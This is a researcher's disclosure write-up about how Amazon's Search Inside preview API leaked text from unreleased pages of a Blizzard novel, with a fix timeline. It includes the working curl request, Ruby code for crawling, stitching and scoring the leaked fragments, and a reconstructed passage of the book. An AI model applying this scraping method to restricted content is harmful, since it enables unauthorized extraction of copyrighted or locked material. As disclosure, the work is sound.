
Discovery

As a fan of everything Blizzard, and of World of Warcraft in particular, I always try to stay up to date with all the lore and content that Blizzard produces, both in-game and in external media such as books or movies. With the Battle for Azeroth expansion pack released earlier this year, Blizzard also prepared a novel, Before the Storm, to introduce fans to the story behind the events that were about to unfold in the game.

While the game was scheduled for release on 15th of August, the book was made available two months earlier, on 12th of June, and a small preview was published through Amazon (and other partners) a few weeks before that.

While the most devoted fans read and analyzed every page available in the preview, I started searching for information about a specific character using the built-in search in the preview reader. To my surprise, I noticed that some of the results could not be previewed (because they were located in the not-yet-released pages of the book), yet the search engine still returned a short excerpt around the searched phrase.

Notice the yellow warning stating that pages 68-80 are not available for preview, while the search result from page 71, with a short excerpt, is visible in the left sidebar.

Since this meant that the data was out there, merely marked as unavailable, I decided to reverse-engineer the API calls the preview interface was making to the back-end service, and found the culprit:

curl 'https://www.amazon.com/gp/search-inside/service-data' \
-XPOST \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: application/json, text/javascript, */*; q=0.01' \
-H 'Accept-Encoding: text' \
--data 'method=getSearchResults&asin=0399594094&buyingAsin=0399594094&query=sylvanas&pageSize=20&pageNumber=1'
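For reference, the same request can be assembled in Ruby, the language used for the crawler described in the next section. This is a minimal sketch that assumes only the endpoint and form fields visible in the curl call; `build_search_request` is a hypothetical helper name, and because the endpoint was disabled after the report, the sketch only builds the request instead of sending it.

```ruby
require "net/http"
require "uri"

# Endpoint and form fields copied from the curl call. The endpoint was
# disabled after the report, so this only illustrates the request's shape.
SEARCH_URI = URI("https://www.amazon.com/gp/search-inside/service-data")

# Build (but do not send) the POST request used by the preview reader's search.
def build_search_request(asin, query, page_size: 20, page_number: 1)
  request = Net::HTTP::Post.new(SEARCH_URI)
  request["Accept"] = "application/json, text/javascript, */*; q=0.01"
  # set_form_data URL-encodes the fields and sets the
  # application/x-www-form-urlencoded Content-Type header.
  request.set_form_data(
    "method" => "getSearchResults",
    "asin" => asin,
    "buyingAsin" => asin,
    "query" => query,
    "pageSize" => page_size.to_s,
    "pageNumber" => page_number.to_s
  )
  request
end

# Sending it would look like this (left commented out on purpose):
# response = Net::HTTP.start(SEARCH_URI.host, SEARCH_URI.port, use_ssl: true) do |http|
#   http.request(build_search_request("0399594094", "sylvanas"))
# end
```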

The curl call above returned a list of matches from the entire book (including the unreleased pages), in this form:

{
    "totalResults": 101,
    "results": [
        [
            "21",
            "much by betrayal from a supposed ally, <b>Sylvanas</b> Windrunner, as by the monstrous, fel-fueled"
        ],
        [
            "28",
            "to fall into the wrong hands. \nInto <b>Sylvanas&#39;s</b> hands \nSo much power \n\tHe closed his"
        ],
        [
            "30",
            "one reason he was the best bodyguard <b>Sylvanas</b> could possibly have. There were other"
        ],
        [
            "31",
            "hazy. \nBut not all of it. \n\tAlthough <b>Sylvanas</b> had left behind most warmer emotions"
        ],
        [
            "32",
            "stone floor outside the small room. <b>Sylvanas</b> closed her eyes, trying to gather patience"
        ]
    ]
}
Output simplified for readability.
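Each result pairs a page number with an excerpt that still carries `<b>` highlight tags and HTML entities such as `&#39;`. Below is a minimal sketch of turning a response of the shape shown above into plain-text `[page, excerpt]` pairs; `parse_search_results` is a hypothetical name, and the sketch assumes the real response keeps the page number and the excerpt as the first two elements of each result.

```ruby
require "json"
require "cgi"

# Turn one search-results response into [page_number, plain_text_excerpt] pairs.
def parse_search_results(body)
  data = JSON.parse(body)
  data.fetch("results").map do |page, excerpt|
    # Strip the <b> highlight tags first, then decode entities such as &#39;,
    # so that an escaped "&lt;b&gt;" in the text itself is not mistaken for a tag.
    text = excerpt.gsub(%r{</?b>}, "")
    [Integer(page), CGI.unescapeHTML(text)]
  end
end
```

Any extra fields after the excerpt (trimmed from the output above) would simply be ignored by the block's destructuring.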

Exploit

With the above in mind, I built a simple Ruby script to crawl the book, starting with a few generic keywords that I knew would appear in several places and then continuing in a divide-and-conquer fashion based on the results returned by the search API. An hour or so later, I had a JSON file with a list of search results, each associated with the page it was found on.
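The exact crawling strategy isn't spelled out, so the following is only one plausible reading of it: a breadth-first keyword expansion in which every new word found in an excerpt becomes a future query. `crawl` and the `search` callable it takes are hypothetical; in practice `search` would wrap the search endpoint described above and return `[page, excerpt]` pairs.

```ruby
require "set"

# Crawl a book through a search function, starting from a few seed keywords.
# `search` is any callable returning [[page, excerpt], ...] for a query.
def crawl(search, seeds, max_queries: 1_000, min_word_length: 4)
  queue = seeds.dup
  seen = Set.new(seeds.map(&:downcase))
  fragments = Hash.new { |h, page| h[page] = Set.new } # page => excerpts
  queries = 0

  until queue.empty? || queries >= max_queries
    query = queue.shift
    queries += 1
    search.call(query).each do |page, excerpt|
      fragments[page] << excerpt
      # Every new, long-enough word in an excerpt becomes a future query,
      # which gradually reaches the text around and between earlier hits.
      excerpt.scan(/[[:alpha:]']+/).each do |word|
        key = word.downcase
        next if key.length < min_word_length || seen.include?(key)
        seen << key
        queue << key
      end
    end
  end
  fragments.transform_values(&:to_a)
end
```

Because each query can only reach text that shares a word with something already found, isolated passages need extra seed keywords; the `max_queries` cap (an assumption) keeps the number of requests bounded.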

[
    "commanded that she do the opposite. He had claimed he had been granted a vision by the loa he honored. You must step out of da shadows and lead. You must be warchief Vol'jin had",
    "that she do the opposite. He had claimed he had been granted a vision by the loa he honored. You must step out of da shadows and lead. You must be warchief Vol'jin had been",
    "she do the opposite. He had claimed he had been granted a vision by the loa he honored. You must step out of da shadows and lead. You must be warchief Vol'jin had been someone",
    "do the opposite. He had claimed he had been granted a vision by the loa he honored. You must step out of da shadows and lead. You must be warchief Vol'jin had been someone she respected"
]

I spent some time trying to figure out the best way to stitch the lines together, and in the end I decided to use a crude longest common substring algorithm: it compares two fragments from the same page and, if they share a long enough common substring, combines them into one. Rinse and repeat until you have just one fragment per page, and voilà.
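The stitching step can be sketched as follows. This is not the original script: instead of a longest-common-substring comparison, it uses a simpler word-level variant that merges two fragments only when the end of one repeats the beginning of the other by at least `min_words` words. `merge_pair`, `stitch` and the 3-word threshold are assumptions for illustration.

```ruby
# Merge fragment `b` into fragment `a` when the tail of `a` repeats the head
# of `b` by at least `min_words` words, or when `b` already sits inside `a`.
# Returns the merged string, or nil when the two do not overlap enough.
def merge_pair(a, b, min_words: 3)
  return a if " #{a} ".include?(" #{b} ")
  aw = a.split
  bw = b.split
  # Try the longest possible overlap first.
  [aw.size, bw.size].min.downto(min_words) do |k|
    return (aw + bw.drop(k)).join(" ") if aw.last(k) == bw.first(k)
  end
  nil
end

# Repeatedly merge overlapping fragments from one page until nothing overlaps.
def stitch(fragments, min_words: 3)
  pieces = fragments.map { |f| f.split.join(" ") }.uniq # normalize whitespace
  loop do
    pair = pieces.permutation(2).find { |a, b| merge_pair(a, b, min_words: min_words) }
    break unless pair
    a, b = pair
    pieces = (pieces - [a, b]) << merge_pair(a, b, min_words: min_words)
    pieces.uniq!
  end
  pieces
end
```

Applied to the four fragments shown earlier, this yields a single passage running from "commanded" to "she respected". Each merge removes at least one piece, so the loop always terminates.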

But with quite literally his dying breath, Vollin, the Horde's leader, had commanded that she do the opposite. He had claimed he had been granted a vision by the loa he honored. You must step out of da shadows and lead. You must be warchief Vol'jin had been someone she respected, although they had clashed on occasion.

Obviously, since this is based on OCRed text and a far-from-ideal method of stitching, the resulting text, while readable, still contains several "typos" and a few missing sections. I'm confident that with improved tools and proper manual review, a 99% extraction (excluding images) is possible. After the book's release, I compared my "leaked" copy with the final release, and the accuracy was around 90%.
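How the 90% figure was measured isn't described. One common way to score such a comparison is a word-level Levenshtein (edit) distance normalized to a similarity between 0 and 1; the sketch below assumes that metric, and `word_similarity` is a hypothetical name.

```ruby
# Word-level Levenshtein distance between two texts, turned into a 0..1
# similarity: 1.0 means identical word sequences.
def word_similarity(extracted, reference)
  a = extracted.split
  b = reference.split
  return 1.0 if a.empty? && b.empty?
  prev = (0..b.size).to_a # distances from the empty prefix of `a`
  a.each_with_index do |wa, i|
    cur = [i + 1]
    b.each_with_index do |wb, j|
      cost = wa == wb ? 0 : 1
      # deletion, insertion, substitution (or match)
      cur << [prev[j + 1] + 1, cur[j] + 1, prev[j] + cost].min
    end
    prev = cur
  end
  1.0 - prev.last.fdiv([a.size, b.size].max)
end
```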

Scope

This vulnerability affected a fairly narrow subset of content available through the Amazon Book Store and only applied to publishers who had joined Amazon's Search Inside program. Through this program, Amazon scans printed books and runs OCR on the resulting images to build a database of searchable fragments from the book. This "feature" lets Amazon return search results based not only on a book's title and a short excerpt but on its entire content.
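To illustrate why such a database can leak text at all, here is a toy search over OCRed pages. It assumes the text of each page is stored whole and that every hit is returned as a window of words around the match, highlighted in `<b>` tags like the response shown in the Discovery section. Nothing here reflects Amazon's actual implementation; `search_inside` and the `window` parameter are hypothetical.

```ruby
require "cgi"

# Toy "search inside": OCR text per page in, [page, excerpt] pairs out.
# Each excerpt is `window` words on either side of the hit, HTML-escaped,
# with the matching word wrapped in <b> tags.
def search_inside(pages, query, window: 6)
  needle = query.downcase
  pages.sort.flat_map do |page, text|
    words = text.split
    hits = words.each_index.select { |i| words[i].downcase.start_with?(needle) }
    hits.map do |i|
      from = [i - window, 0].max
      excerpt = words[from..(i + window)].map.with_index(from) do |w, k|
        escaped = CGI.escapeHTML(w)
        k == i ? "<b>#{escaped}</b>" : escaped
      end
      [page.to_s, excerpt.join(" ")]
    end
  end
end
```

Nothing in this function knows which pages are previewable; that decision has to be made somewhere else, and in this case it was made in the browser.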

This program is usually paired with another product Amazon offers to publishers: Look Inside. Whereas Search Inside only improves search results, Look Inside lets users actually preview the scanned pages before purchasing the product. When both features are enabled for a given book, users can also search the book for any phrase from within the preview interface.

Both programs also apply to books available for pre-order, and many publishers use these previews as one stage of their marketing campaign before the book's release. According to Amazon's documentation, several limitations are in place, and publishers have some control over which pages are available for preview (i.e., to prevent spoilers). Unfortunately, as we have seen, some of these limitations were implemented only in the client-side code, which goes against standard security practice.
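Enforcing the limit on the server instead could look like the following minimal sketch, which blanks out excerpts from pages outside the publisher's previewable ranges before the response is sent, so the client never receives them. This is not necessarily how Amazon fixed the issue; `restrict_results` and the `previewable` list of page ranges are hypothetical.

```ruby
# Remove excerpts for pages the publisher has not opened for preview.
# `results` uses the [page, excerpt] shape of the search response;
# `previewable` is a list of Ranges of page numbers.
def restrict_results(results, previewable)
  results.map do |page, excerpt|
    allowed = previewable.any? { |range| range.cover?(Integer(page)) }
    [page, allowed ? excerpt : nil]
  end
end
```

With pages 68-80 excluded, a hit on page 71 would still report its page number but carry no text; dropping such hits entirely would also hide which locked pages mention the search term.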

Timeline

17th May 2018 12:02 GMT+02 - Initial Report
17th May 2018 14:22 GMT+02 - Request for more information
18th May 2018 23:08 GMT+02 - Issue confirmed and triaged
22nd May 2018 17:41 GMT+02 - Public API disabled
23rd May 2018 23:26 GMT+02 - Hotfix deployed
31st May 2018 20:17 GMT+02 - Final fix deployed

Disclaimer: Amazon does not have a bug bounty program and offered nothing beyond its thanks for bringing the vulnerability to its attention. Blizzard Entertainment (as the copyright holder of the book I was testing with) was also notified of this vulnerability and offered a small gift.